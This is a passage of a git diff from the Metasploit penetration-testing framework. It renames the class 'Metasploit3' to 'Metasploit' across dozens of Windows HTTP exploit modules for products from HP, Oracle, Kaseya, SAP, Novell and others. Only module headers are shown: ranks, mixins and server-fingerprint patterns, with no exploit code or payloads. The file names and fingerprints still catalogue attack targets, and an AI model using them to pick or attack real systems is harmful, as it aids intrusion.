=> '/OvCgi/OpenView.exe', :pattern => /Hewlett-Packard Development Company/ } diff --git a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb index 691934ac8e..acf7cfd1a6 100644 --- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb +++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb index ed9ddab692..8cc3e74bfd 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_certificates.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb index 40eb5cab67..3272545d69 100644 --- a/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb +++ b/modules/exploits/windows/http/hp_pcm_snac_update_domain.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/hp_power_manager_filename.rb b/modules/exploits/windows/http/hp_power_manager_filename.rb index db9a37d637..017a1e6a28 100644 --- a/modules/exploits/windows/http/hp_power_manager_filename.rb +++ b/modules/exploits/windows/http/hp_power_manager_filename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_power_manager_login.rb b/modules/exploits/windows/http/hp_power_manager_login.rb index 3215be533a..150945f97e 100644 --- a/modules/exploits/windows/http/hp_power_manager_login.rb +++ b/modules/exploits/windows/http/hp_power_manager_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb index a221aebd55..14c184703d 100644 --- a/modules/exploits/windows/http/hp_sitescope_dns_tool.rb +++ b/modules/exploits/windows/http/hp_sitescope_dns_tool.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb index 9310991d96..c37689db26 100644 --- a/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb +++ b/modules/exploits/windows/http/hp_sitescope_runomagentcommand.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/httpdx_handlepeer.rb b/modules/exploits/windows/http/httpdx_handlepeer.rb index d6802c853e..80f56f1d92 100644 --- a/modules/exploits/windows/http/httpdx_handlepeer.rb +++ b/modules/exploits/windows/http/httpdx_handlepeer.rb @@ -19,7 +19,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /httpdx\/.* \(Win32\)/ ] } diff --git a/modules/exploits/windows/http/httpdx_tolog_format.rb b/modules/exploits/windows/http/httpdx_tolog_format.rb index bb0bf66cdc..488f09f6ad 100644 --- a/modules/exploits/windows/http/httpdx_tolog_format.rb +++ b/modules/exploits/windows/http/httpdx_tolog_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ia_webmail.rb b/modules/exploits/windows/http/ia_webmail.rb index d20b2d65ea..7392d5b5dd 100644 --- a/modules/exploits/windows/http/ia_webmail.rb +++ b/modules/exploits/windows/http/ia_webmail.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb index 7ce4a44b51..c02d083972 100644 --- a/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb +++ b/modules/exploits/windows/http/ibm_tivoli_endpoint_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb index fba7ae256a..379820d58b 100644 --- a/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb +++ b/modules/exploits/windows/http/ibm_tpmfosd_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/ibm_tsm_cad_header.rb b/modules/exploits/windows/http/ibm_tsm_cad_header.rb index b7e738d5b4..72df9d21b0 100644 --- a/modules/exploits/windows/http/ibm_tsm_cad_header.rb +++ b/modules/exploits/windows/http/ibm_tsm_cad_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/icecast_header.rb b/modules/exploits/windows/http/icecast_header.rb index eab3afafdd..144fb4bb7f 100644 --- a/modules/exploits/windows/http/icecast_header.rb +++ b/modules/exploits/windows/http/icecast_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/integard_password_bof.rb b/modules/exploits/windows/http/integard_password_bof.rb index 1b8962d096..88c2281837 100644 --- a/modules/exploits/windows/http/integard_password_bof.rb +++ b/modules/exploits/windows/http/integard_password_bof.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # stack bof, seh, universal ret, auto targeting include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/intersystems_cache.rb b/modules/exploits/windows/http/intersystems_cache.rb index 6cec7edfd1..7ae04dd3ed 100644 --- a/modules/exploits/windows/http/intersystems_cache.rb +++ b/modules/exploits/windows/http/intersystems_cache.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # XXX: Needs custom body check HttpFingerprint = { :uri => '/csp/sys/mgr/UtilConfigHome.csp', :body => [ /Cache for Windows/ ] } diff --git a/modules/exploits/windows/http/intrasrv_bof.rb b/modules/exploits/windows/http/intrasrv_bof.rb index 936bfb0e44..43e5794c4c 100644 --- a/modules/exploits/windows/http/intrasrv_bof.rb +++ b/modules/exploits/windows/http/intrasrv_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb index c5ce138480..a0caa62e6e 100644 --- a/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb +++ b/modules/exploits/windows/http/ipswitch_wug_maincfgret.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking # [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" ) diff --git a/modules/exploits/windows/http/jira_collector_traversal.rb b/modules/exploits/windows/http/jira_collector_traversal.rb index 1fcd7c1d38..91259f8dc0 100644 --- a/modules/exploits/windows/http/jira_collector_traversal.rb +++ b/modules/exploits/windows/http/jira_collector_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kaseya_uploader.rb b/modules/exploits/windows/http/kaseya_uploader.rb index a481ff4676..4c4aa992ae 100644 --- a/modules/exploits/windows/http/kaseya_uploader.rb +++ b/modules/exploits/windows/http/kaseya_uploader.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb index ab0204bfc9..48b77af609 100644 --- a/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb +++ b/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/kolibri_http.rb b/modules/exploits/windows/http/kolibri_http.rb index afd75aa97d..099e0dbc51 100644 --- a/modules/exploits/windows/http/kolibri_http.rb +++ b/modules/exploits/windows/http/kolibri_http.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking HttpFingerprint = { :pattern => [ /kolibri-2\.0/ ] } diff --git a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb index bac17e0e49..f4eaebfb4e 100644 --- a/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb +++ b/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb index 39c4b04f60..6ba0f7ca7a 100644 --- a/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb +++ b/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper diff --git a/modules/exploits/windows/http/mailenable_auth_header.rb b/modules/exploits/windows/http/mailenable_auth_header.rb index 83fd3da795..8bc3b959d3 100644 --- a/modules/exploits/windows/http/mailenable_auth_header.rb +++ b/modules/exploits/windows/http/mailenable_auth_header.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /MailEnable/ ] } diff --git a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb index 18ae25b9b5..e2b4c84644 100644 --- a/modules/exploits/windows/http/manage_engine_opmanager_rce.rb +++ b/modules/exploits/windows/http/manage_engine_opmanager_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote # It removes large object in database, shoudn't be a problem, but just in case.... Rank = ManualRanking diff --git a/modules/exploits/windows/http/manageengine_apps_mngr.rb b/modules/exploits/windows/http/manageengine_apps_mngr.rb index e017dd250a..cf33a6b8da 100644 --- a/modules/exploits/windows/http/manageengine_apps_mngr.rb +++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/manageengine_connectionid_write.rb b/modules/exploits/windows/http/manageengine_connectionid_write.rb index e69b65abee..84b93b9293 100644 --- a/modules/exploits/windows/http/manageengine_connectionid_write.rb +++ b/modules/exploits/windows/http/manageengine_connectionid_write.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'nokogiri' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/maxdb_webdbm_database.rb b/modules/exploits/windows/http/maxdb_webdbm_database.rb index 1764bf01ea..e4756c66e3 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_database.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_database.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb index 4488698868..05afc25499 100644 --- a/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb +++ b/modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/mcafee_epolicy_source.rb b/modules/exploits/windows/http/mcafee_epolicy_source.rb index 5a33167929..3cb4379108 100644 --- a/modules/exploits/windows/http/mcafee_epolicy_source.rb +++ b/modules/exploits/windows/http/mcafee_epolicy_source.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb index 3f17071de0..bf4a35bb75 100644 --- a/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb +++ b/modules/exploits/windows/http/mdaemon_worldclient_form2raw.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/minishare_get_overflow.rb b/modules/exploits/windows/http/minishare_get_overflow.rb index f02594d536..f2213521aa 100644 --- a/modules/exploits/windows/http/minishare_get_overflow.rb +++ b/modules/exploits/windows/http/minishare_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/miniweb_upload_wbem.rb b/modules/exploits/windows/http/miniweb_upload_wbem.rb index 9fe3d101c1..b3dfd840ee 100644 --- a/modules/exploits/windows/http/miniweb_upload_wbem.rb +++ b/modules/exploits/windows/http/miniweb_upload_wbem.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /MiniWeb/ ] } diff --git a/modules/exploits/windows/http/navicopa_get_overflow.rb b/modules/exploits/windows/http/navicopa_get_overflow.rb index d9c46a3d2a..e182045464 100644 --- a/modules/exploits/windows/http/navicopa_get_overflow.rb +++ b/modules/exploits/windows/http/navicopa_get_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /InterVations/ ] } diff --git a/modules/exploits/windows/http/netdecision_http_bof.rb b/modules/exploits/windows/http/netdecision_http_bof.rb index b897f791b1..b4ea62acaf 100644 --- a/modules/exploits/windows/http/netdecision_http_bof.rb +++ b/modules/exploits/windows/http/netdecision_http_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/novell_imanager_upload.rb b/modules/exploits/windows/http/novell_imanager_upload.rb index 466ddbbae6..050ab91927 100644 --- a/modules/exploits/windows/http/novell_imanager_upload.rb +++ b/modules/exploits/windows/http/novell_imanager_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] } diff --git a/modules/exploits/windows/http/novell_mdm_lfi.rb b/modules/exploits/windows/http/novell_mdm_lfi.rb index b70727e917..a3a138768a 100644 --- a/modules/exploits/windows/http/novell_mdm_lfi.rb +++ b/modules/exploits/windows/http/novell_mdm_lfi.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE diff --git a/modules/exploits/windows/http/novell_messenger_acceptlang.rb b/modules/exploits/windows/http/novell_messenger_acceptlang.rb index d52305bdb8..a5308b4219 100644 --- a/modules/exploits/windows/http/novell_messenger_acceptlang.rb +++ b/modules/exploits/windows/http/novell_messenger_acceptlang.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/nowsms.rb b/modules/exploits/windows/http/nowsms.rb index 05f4c9ecb3..5a93fa9feb 100644 --- a/modules/exploits/windows/http/nowsms.rb +++ b/modules/exploits/windows/http/nowsms.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle9i_xdb_pass.rb b/modules/exploits/windows/http/oracle9i_xdb_pass.rb index 06b563e0cf..c2687a0f54 100644 --- a/modules/exploits/windows/http/oracle9i_xdb_pass.rb +++ b/modules/exploits/windows/http/oracle9i_xdb_pass.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/oracle_beehive_evaluation.rb b/modules/exploits/windows/http/oracle_beehive_evaluation.rb index 19dbbe04ce..0f162ff621 100644 --- a/modules/exploits/windows/http/oracle_beehive_evaluation.rb +++ b/modules/exploits/windows/http/oracle_beehive_evaluation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb index 12a2318607..f237938d88 100644 --- a/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb +++ b/modules/exploits/windows/http/oracle_beehive_prepareaudiotoplay.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_btm_writetofile.rb b/modules/exploits/windows/http/oracle_btm_writetofile.rb index 7980ec25ae..6011d242f3 100644 --- a/modules/exploits/windows/http/oracle_btm_writetofile.rb +++ b/modules/exploits/windows/http/oracle_btm_writetofile.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index 3e8ce2702c..cd011b2a62 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/powershell' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 853c55c046..3694398dc4 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/osb_uname_jlist.rb b/modules/exploits/windows/http/osb_uname_jlist.rb index e8f3f218c1..99bf3bc8d8 100644 --- a/modules/exploits/windows/http/osb_uname_jlist.rb +++ b/modules/exploits/windows/http/osb_uname_jlist.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/windows/http/peercast_url.rb b/modules/exploits/windows/http/peercast_url.rb index 6d1632f045..866adf8792 100644 --- a/modules/exploits/windows/http/peercast_url.rb +++ b/modules/exploits/windows/http/peercast_url.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/php_apache_request_headers_bof.rb b/modules/exploits/windows/http/php_apache_request_headers_bof.rb index 4b7e9feccf..a588859cc5 100644 --- a/modules/exploits/windows/http/php_apache_request_headers_bof.rb +++ b/modules/exploits/windows/http/php_apache_request_headers_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/privatewire_gateway.rb b/modules/exploits/windows/http/privatewire_gateway.rb index 3671981570..a5b094110f 100644 --- a/modules/exploits/windows/http/privatewire_gateway.rb +++ b/modules/exploits/windows/http/privatewire_gateway.rb @@ -8,7 +8,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 9c50701f47..d57e3d5b4f 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb @@ -5,7 +5,7 @@ -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/rabidhamster_r4_log.rb b/modules/exploits/windows/http/rabidhamster_r4_log.rb index d63fe48e99..62d385169f 100644 --- a/modules/exploits/windows/http/rabidhamster_r4_log.rb +++ b/modules/exploits/windows/http/rabidhamster_r4_log.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 41cbf1fae9..7305cbf62a 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index e4b0a0e1ed..480c346c9a 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb index 0ef0bb0f34..338e61def3 100644 --- a/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb +++ b/modules/exploits/windows/http/sap_configservlet_exec_noauth.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit +class Metasploit < Msf::Exploit Rank = GreatRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index 06dc9a7abb..f3aa5c8d78 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/sapdb_webtools.rb b/modules/exploits/windows/http/sapdb_webtools.rb index 67ed566e16..24b366812d 100644 --- a/modules/exploits/windows/http/sapdb_webtools.rb +++ b/modules/exploits/windows/http/sapdb_webtools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /SAP-Internet-SapDb-Server\// ] } diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index bf44556edd..0535881db5 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking HttpFingerprint = { :pattern => [ /Savant\/3\.1/ ] } diff --git a/modules/exploits/windows/http/servu_session_cookie.rb b/modules/exploits/windows/http/servu_session_cookie.rb index c4a78a8faa..70312715af 100644 --- a/modules/exploits/windows/http/servu_session_cookie.rb +++ b/modules/exploits/windows/http/servu_session_cookie.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/shoutcast_format.rb b/modules/exploits/windows/http/shoutcast_format.rb index aeb11ebc39..fd893c856e 100644 --- a/modules/exploits/windows/http/shoutcast_format.rb +++ b/modules/exploits/windows/http/shoutcast_format.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/shttpd_post.rb b/modules/exploits/windows/http/shttpd_post.rb index f3dbbe7725..d7f9f91c05 100644 --- a/modules/exploits/windows/http/shttpd_post.rb +++ b/modules/exploits/windows/http/shttpd_post.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb index 5ba781def4..961af5e2a4 100644 --- a/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb +++ b/modules/exploits/windows/http/solarwinds_fsm_userlogin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb index ff35263e44..9afe16a3c4 100644 --- 